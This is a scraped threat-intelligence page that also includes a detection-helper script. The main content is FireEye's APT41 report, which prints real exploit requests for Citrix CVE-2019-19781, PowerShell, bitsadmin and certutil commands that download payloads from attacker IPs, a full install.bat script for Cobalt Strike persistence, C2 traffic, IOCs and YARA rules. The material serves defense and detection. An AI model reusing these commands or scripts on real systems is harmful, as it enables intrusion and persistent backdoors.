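at the export DLL name offset. The PE image is constructed, not a sample.
"""
import re
import struct

# Name patterns from the three ExportEngine_* rules; match() anchors them at
# the offset, which is what YARA's "$pcre at <offset>" does.
EXPORT_NAME_RULES = {
    "ExportEngine_APT41_Loader_String": re.compile(rb"loader_[\x00-\x7F]+\x00"),
    "ExportEngine_ShortName": re.compile(rb"[A-Za-z0-9]\.(dll|exe|dat|bin|sys)"),
    "ExportEngine_xArch": re.compile(rb"[\x00-\x7F]+x(32|64|86)\.dat\x00"),
}


def rva_to_offset(rva, sections):
    """File offset for an RVA, like yara's pe.rva_to_offset (None if unmapped)."""
    for vsize, va, raw_size, raw_ptr in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    return None


def export_name_offset(data):
    """Offset of the export DLL name, or None if data is not a PE with an
    export directory. Mirrors: uint16(0) == 0x5A4D and
    uint32(uint32(0x3C)) == 0x00004550 and
    pe.rva_to_offset(uint32(pe.rva_to_offset(export_dir_rva) + 12))."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dd = {0x10B: 96, 0x20B: 112}.get(magic)   # data directory start, PE32 / PE32+
    if dd is None:
        return None
    export_rva = struct.unpack_from("<I", data, opt + dd)[0]   # directory entry 0 = export
    if export_rva == 0:
        return None
    # Section headers: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData at +8
    sections = [struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
                for i in range(num_sections)]
    export_off = rva_to_offset(export_rva, sections)
    if export_off is None:
        return None
    name_rva = struct.unpack_from("<I", data, export_off + 12)[0]
    return rva_to_offset(name_rva, sections)


def export_dll_name(data):
    """The export DLL name as text, or None."""
    off = export_name_offset(data)
    if off is None:
        return None
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")


def matching_rules(data):
    """Names of the ExportEngine_* rules whose pattern matches at the export name."""
    off = export_name_offset(data)
    if off is None:
        return []
    return [name for name, rx in EXPORT_NAME_RULES.items() if rx.match(data, off)]


def build_pe(export_name):
    """Constructed minimal PE32: one section holding an export directory whose
    Name RVA points at export_name. Not loadable, just enough header to parse."""
    sec_va, sec_raw, sec_size = 0x1000, 0x200, 0x200
    img = bytearray(sec_raw + sec_size)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x40)                   # e_lfanew
    nt = 0x40
    img[nt:nt + 4] = b"PE\0\0"
    # COFF header: i386, one section, 224-byte optional header, DLL characteristics
    struct.pack_into("<HHIIIHH", img, nt + 4, 0x14C, 1, 0, 0, 0, 224, 0x2102)
    opt = nt + 24
    struct.pack_into("<H", img, opt, 0x10B)                   # PE32 magic
    struct.pack_into("<II", img, opt + 96, sec_va, 40 + len(export_name) + 1)  # export dir
    sec = opt + 224
    img[sec:sec + 8] = b".edata\0\0"
    struct.pack_into("<IIII", img, sec + 8, sec_size, sec_va, sec_size, sec_raw)
    struct.pack_into("<I", img, sec_raw + 12, sec_va + 40)    # Name RVA, after the 40-byte table
    img[sec_raw + 40:sec_raw + 40 + len(export_name) + 1] = export_name + b"\0"
    return bytes(img)


if __name__ == "__main__":
    for name in (b"loader_X86_svchost.dll", b"a.dll", b"loader_x86.dat", b"kernel32.dll"):
        pe = build_pe(name)
        print(export_dll_name(pe), "->", matching_rules(pe) or "no match")
```

Anchoring at the name offset is what keeps these rules narrow: a `loader_` string anywhere else in the file (a log message, a resource) does not fire them, only the export directory's own name does, which is also why a packed sample whose export table is rebuilt at runtime will not match on disk.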
{"id": "FIREEYE:BFB36D22F20651C632D25AA20588E904", "type": "fireeye", "bulletinFamily": "info", "title": "This Is\u00a0Not a Test: APT41 Initiates Global Intrusion Campaign Using Multiple Exploits", "description": "Beginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese cyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed APT41 attempt to exploit vulnerabilities in [Citrix NetScaler/ADC](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), Cisco routers, and [Zoho ManageEngine Desktop Central](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>) at over 75 FireEye customers. Countries we\u2019ve seen targeted include Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance, Construction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal, Manufacturing, Media, Non-profit, Oil & Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications, Transportation, Travel, and Utility. 
It\u2019s unclear if APT41 scanned the Internet and attempted exploitation en masse or selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\n\n#### Exploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\n\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application Delivery Controller (ADC) and Citrix Gateway devices with [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) (published December 17, 2019).\n\n\n\n \nFigure 1: Timeline of key events\n\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command \u2018file /bin/pwd\u2019, which may have achieved two objectives for APT41. First, it would confirm whether the system was vulnerable and the [mitigation](<https://support.citrix.com/article/CTX267679>) wasn\u2019t applied. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step. \n\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting APT41 was operating with an already-known list of identified devices accessible on the internet.\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1 \nHost: [redacted] \nConnection: close \nAccept-Encoding: gzip, deflate \nAccept: */* \nUser-Agent: python-requests/2.22.0 \nNSC_NONCE: nsroot \nNSC_USER: ../../../netscaler/portal/templates/[redacted] \nContent-Length: 96 \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %] \n \n--- \n \nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar New Year holidays which occurred between January 24 and January 30, 2020. 
This has been a common activity pattern by Chinese APT groups in past years as well.\n\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor).\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 147 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title=[redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/bsd ftp://test:[redacted]\\@66.42.98[.]220/bsd**`') %] \n \n--- \n \nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China initiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and rolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible that this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have remained active in other ways, which we were unable to observe with FireEye telemetry. We observed a significant uptick in CVE-2019-19781 exploitation on February 24 and February 25. 
The exploit behavior was almost identical to the activity on February 1, where only the name of the payload \u2018un\u2019 changed.\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 \nAccept-Encoding: identity \nContent-Length: 145 \nConnection: close \nNsc_User: ../../../netscaler/portal/templates/[redacted] \nUser-Agent: Python-urllib/2.7 \nNsc_Nonce: nsroot \nHost: [redacted] \nContent-Type: application/x-www-form-urlencoded \n \nurl=http://example.com&title= [redacted]&desc=[% template.new('BLOCK' = '**print `/usr/bin/ftp -o /tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un**`') %] \n \n--- \n \nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\n\nCitrix released a [mitigation](<https://support.citrix.com/article/CTX267027>) for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released permanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\n\n#### Cisco Router Exploitation\n\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization and downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named \u2018fuc\u2019 (MD5: 155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit module that combines two CVE\u2019s ([CVE-2019-1653](<https://nvd.nist.gov/vuln/detail/CVE-2019-1653>) and [CVE-2019-1652](<https://nvd.nist.gov/vuln/detail/CVE-2019-1652>)) to [enable remote code execution on Cisco RV320 and RV325](<https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv32x_rce>) small business routers and uses wget to download the specified payload.\n\nGET /test/fuc \nHTTP/1.1 \nHost: 66.42.98\\\\.220 \nUser-Agent: Wget \nConnection: close \n \n--- \n \nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\n\n66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. 
The content of 1.txt (MD5: c0c467c8e9b2046d7053642cc9bdd57d) is \u2018cat /etc/flash/etc/nk_sysconfig\u2019, which is the command one would execute on a Cisco RV320 router to display the current configuration.\n\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to review the following security advisories and take appropriate action:\n\n * [Cisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info>)\n * [Cisco Small Business RV320 and RV325 Routers Command Injection Vulnerability](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-inject>)\n\n#### Exploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\n\nOn March 5, 2020, researcher [Steven Seeley](<https://twitter.com/steventseeley/status/1235635108498948096?s=20>), published [an advisory](<https://srcincite.io/advisories/src-2020-0011/>) and released [proof-of-concept code](<https://srcincite.io/pocs/src-2020-0011.py.txt>) for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474 ([CVE-2020-10189)](<https://nvd.nist.gov/vuln/detail/CVE-2020-10189>). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit the Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise of at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and storesyncsvc.dll) were deployed. 
In the first variation, the CVE-2020-10189 exploit was used to directly upload “logger.zip”, a simple Java-based program containing a set of commands that use PowerShell to download and execute install.bat and storesyncsvc.dll.

```
java/lang/Runtime
getRuntime
()Ljava/lang/Runtime;
Xcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
'(Ljava/lang/String;)Ljava/lang/Process;
StackMapTable
ysoserial/Pwner76328858520609
Lysoserial/Pwner76328858520609;
```

Figure 6: Contents of logger.zip

Here we see a toolmark from the tool [ysoserial](<https://github.com/frohoff/ysoserial>) that was used to create the payload in the POC. The string Pwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source material in their operation.

In the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to download install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure 66.42.98[.]220 on port 12345.

```
Parent Process: C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe
Process Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\Users\Public\install.bat
```

Figure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation

In both variations, the install.bat batch file was used to install persistence for a trial-version Cobalt Strike BEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).

```bat
@echo off
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "%SERVICE_NAME%" /t REG_MULTI_SZ /d "%SERVICE_NAME%" /f
sc create "%SERVICE_NAME%" binPath= "%SystemRoot%\system32\svchost.exe -k %SERVICE_NAME%" type= share start= auto error= ignore DisplayName= "%DISPLAY_NAME%"
SC failure "%SERVICE_NAME%" reset= 86400 actions= restart/60000/restart/60000/restart/60000
sc description "%SERVICE_NAME%" "%DESCRIPTION%"
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\%SERVICE_NAME%\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "%WORK_DIR%\%DLL_NAME%" /f
net start "%SERVICE_NAME%"
```

Figure 8: Contents of install.bat

Storesyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com (with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.

```
GET /jquery-3.3.1.min.js HTTP/1.1
Host: cdn.bootcss.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://cdn.bootcss.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYMDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI
User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Connection: Keep-Alive
Cache-Control: no-cache
```

Figure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request

Within a few hours of initial exploitation, APT41 used the storesyncsvc.dll BEACON backdoor to download a secondary backdoor with a different C2 address. The download was performed with Microsoft CertUtil, a common TTP that we’ve observed APT41 use in past intrusions, and retrieved 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to download Cobalt Strike BEACON shellcode. The use of VMProtected binaries is another very common TTP that we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their toolkit.

```
GET /2.exe HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.3
Host: 91.208.184[.]78
```

Figure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil

```
certutil -urlcache -split -f http://91.208.184[.]78/2.exe
```

Figure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader

The Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to download the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).

```
GET /TzGG HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
Host: 91.208.184[.]78:443
Connection: Keep-Alive
Cache-Control: no-cache
```

Figure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON

The downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an example of the actor attempting to diversify post-exploitation access to the compromised systems.

ManageEngine released a short-term [mitigation](<https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html>) for CVE-2020-10189 on January 20, 2020, and subsequently released an [update](<https://www.manageengine.com/products/desktop-central/rce-vulnerability-cve-2020-10189.html?utm_source=rce-kb>) on March 7, 2020, with a long-term fix.

#### Outlook

This activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent years. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation _has focused on a subset of our customers_, and seems to reveal a high operational tempo and wide collection requirements for APT41.

It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful they are and how quickly they can leverage newly disclosed vulnerabilities to their advantage.

Previously, FireEye Mandiant Managed Defense identified APT41 successfully leveraging CVE-2019-3396 (Atlassian Confluence) against a U.S. based university.
While APT41 is a unique state-sponsored Chinese threat group that conducts espionage, the actor also conducts financially motivated activity for personal gain.

#### Indicators

| Type | Indicator(s) |
|---|---|
| CVE-2019-19781 Exploitation (Citrix Application Delivery Controller) | 66.42.98[.]220 |
| | CVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’ |
| | CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]@66.42.98[.]220/bsd’ |
| | CVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o /tmp/un ftp://test:[redacted]@66.42.98[.]220/un’ |
| | /tmp/bsd |
| | /tmp/un |
| Cisco Router Exploitation | 66.42.98[.]220 |
| | ‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d) |
| | ‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc) |
| CVE-2020-10189 (Zoho ManageEngine Desktop Central) | 66.42.98[.]220 |
| | 91.208.184[.]78 |
| | 74.82.201[.]8 |
| | exchange.dumb1[.]com |
| | install.bat (MD5: 7966c2c546b71e800397a67f942858d0) |
| | storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f) |
| | C:\Windows\Temp\storesyncsvc.dll |
| | C:\Windows\Temp\install.bat |
| | 2.exe (MD5: 3e856162c36b532925c8226b4ed3481c) |
| | C:\Users\[redacted]\install.bat |
| | TzGG (MD5: 659bd19b562059f3f0cc978e15624fd9) |
| | C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe spawning cmd.exe and/or bitsadmin.exe |
| | Certutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78 |
| | PowerShell downloading files with Net.WebClient |

#### Detecting the Techniques

FireEye detects this activity across our platforms.
This table contains several specific detection names from a larger list of detections that were available prior to this activity occurring.

| Platform | Signature Name |
|---|---|
| Endpoint Security | BITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY) |
| | CERTUTIL.EXE DOWNLOADER A (UTILITY) |
| | Generic.mg.5909983db4d9023e |
| | Generic.mg.3e856162c36b5329 |
| | POWERSHELL DOWNLOADER (METHODOLOGY) |
| | SUSPICIOUS BITSADMIN USAGE B (METHODOLOGY) |
| | SAMWELL (BACKDOOR) |
| | SUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT) |
| Network Security | Backdoor.Meterpreter |
| | DTI.Callback |
| | Exploit.CitrixNetScaler |
| | Trojan.METASTAGE |
| | Exploit.ZohoManageEngine.CVE-2020-10198.Pwner |
| | Exploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader |
| Helix | CITRIX ADC [Suspicious Commands] |
| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt] |
| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success] |
| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access] |
| | EXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning] |
| | MALWARE METHODOLOGY [Certutil User-Agent] |
| | WINDOWS METHODOLOGY [BITSadmin Transfer] |
| | WINDOWS METHODOLOGY [Certutil Downloader] |

#### MITRE ATT&CK Technique Mapping

| ATT&CK | Techniques |
|---|---|
| Initial Access | External Remote Services (T1133), Exploit Public-Facing Application (T1190) |
| Execution | PowerShell (T1086), Scripting (T1064) |
| Persistence | New Service (T1050) |
| Privilege Escalation | Exploitation for Privilege Escalation (T1068) |
| Defense Evasion | BITS Jobs (T1197), Process Injection (T1055) |
| Command And Control | Remote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port (T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132), Standard Application Layer Protocol (T1071) |

#### Appendix A: Discovery Rules

The following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary methods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery rules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of these rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Others are broad in aperture and build larger haystacks for further automation or processing in threat hunting systems.

```yara
import "pe"

rule ExportEngine_APT41_Loader_String
{
    meta:
        author = "@stvemillertime"
        description = "This looks for a common APT41 Export DLL name in BEACON shellcode loaders, such as loader_X86_svchost.dll"
    strings:
        $pcre = /loader_[\x00-\x7F]{1,}\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_ShortName
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is a single character"
    strings:
        $pcre = /[A-Za-z0-9]{1}\.(dll|exe|dat|bin|sys)/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule ExportEngine_xArch
{
    meta:
        author = "@stvemillertime"
        description = "This looks for Win PEs where Export DLL name is something like x32.dat"
    strings:
        $pcre = /[\x00-\x7F]{1,}x(32|64|86)\.dat\x00/
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_to_offset(pe.data_directories[pe.IMAGE_DIRECTORY_ENTRY_EXPORT].virtual_address) + 12))
}

rule RareEquities_LibTomCrypt
{
    meta:
        author = "@stvemillertime"
        description = "This looks for executables with strings from LibTomCrypt as seen by some APT41-esque actors https://github.com/libtom/libtomcrypt - might catch everything BEACON as well. You may want to exclude Golang and UPX packed samples."
    strings:
        $a1 = "LibTomMath"
    condition:
        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1
}

rule RareEquities_KCP
{
    meta:
        author = "@stvemillertime"
        description = "This is a wide catchall rule looking for executables with equities for a transport library called KCP, https://github.com/skywind3000/kcp Matches on this rule may have built-in KCP transport ability."
    strings:
        $a01 = "[RO] %ld bytes"
        $a02 = "recv sn=%lu"
        $a03 = "[RI] %d bytes"
        $a04 = "input ack: sn=%lu rtt=%ld rto=%ld"
        $a05 = "input psh: sn=%lu ts=%lu"
        $a06 = "input probe"
        $a07 = "input wins: %lu"
        $a08 = "rcv_nxt=%lu\\n"
        $a09 = "snd(buf=%d, queue=%d)\\n"
        $a10 = "rcv(buf=%d, queue=%d)\\n"
        $a11 = "rcvbuf"
    condition:
        (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 5MB and 3 of ($a*)
}

rule ConventionEngine_Term_Users
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "09e4e6fa85b802c46bc121fcaecc5666"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Users[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Term_Desktop
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "71cdba3859ca8bd03c1e996a790c04f9"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}Desktop[\x00-\xFF]{0,200}\.pdb\x00/ nocase ascii
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre
}

rule ConventionEngine_Anomaly_MultiPDB_Double
{
    meta:
        author = "@stvemillertime"
        description = "Searching for PE files with PDB path keywords, terms or anomalies."
        sample_md5 = "013f3bde3f1022b6cf3f2e541d19353c"
        ref_blog = "https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-devilish-debug-details-part-one-pdb-paths-malware.html"
    strings:
        $pcre = /RSDS[\x00-\xFF]{20}[a-zA-Z]:\\[\x00-\xFF]{0,200}\.pdb\x00/
    condition:
        (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2
}
```
{"threatpost": [{"lastseen": "2020-10-15T22:22:15", "description": "Researchers warn that APT41, a notorious China-linked threat group, has targeted more than 75 organizations worldwide in \u201cone of the broadest campaigns by a Chinese cyber-espionage actor observed in recent years.\u201d\n\nBetween Jan. 20 and March 11, researchers observed APT41 exploiting vulnerabilities in Citrix NetScaler/ADC, Cisco routers and Zoho ManageEngine Desktop Central as part of the widespread espionage campaign. Researchers said it\u2019s unclear if APT41 attempted exploitation en masse, or if they honed in on specific organizations \u2014 but the victims do appear to be more targeted in nature.\n\n\u201cWhile APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of NetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal a high operational tempo and wide collection requirements for APT41,\u201d wrote Christopher Glyer, Dan Perez, Sarah Jones and Steve Miller with FireEye, in a [Wednesday analysis](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nDozens of companies were targeted from varying industries, including banking and finance, defense industrial bases, government, healthcare, legal, manufacturing, media, non-profit, oil and gas, transportation and utilities. APT41 also targeted firms from a broad array of countries, including Australia, Canada, Denmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia, Singapore, Sweden, Switzerland, UAE, the U.K. and the U.S.\n\n**Cisco, Citrix and Zoho Exploits**\n\nStarting on Jan. 
20, researchers observed the threat group attempting to exploit the notorious flaw ([CVE-2019-19781](<https://support.citrix.com/article/CTX267027>)) in Citrix Application Delivery Controller (ADC) and Citrix Gateway devices revealed as a zero-day then patched earlier this year. It was [disclosed on Dec. 17](<https://threatpost.com/critical-citrix-bug-80000-corporate-lans-at-risk/151444/>) \u2013 and [proof of concept (PoC) code](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) was released shortly after \u2013 before a patch [was issued in January](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>).\n\nIn this campaign, researchers observed three waves of exploits against [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>) \u2013 the first on Jan. 20 \u2013 21, the second on Feb. 1, and finally a \u201csignificant uptick\u201d in exploitation on Feb. 24 \u2013 25.\n\nPost-exploit, APT41 executed a command (\u2018file /bin/pwd\u2019) on affected systems that researchers say may have achieved two objectives: \u201cFirst, it would confirm whether the system was vulnerable and the mitigation wasn\u2019t applied,\u201d researchers noted. \u201cSecond, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\u201d\n\nOn Feb. 21, researchers next observed APT41 switching gears to exploit a Cisco RV320 router (Cisco\u2019s WAN VPN routers for small businesses) at a telecommunications organization. After exploitation, the threat actors downloaded an executable and linkable format (ELF) binary payload. 
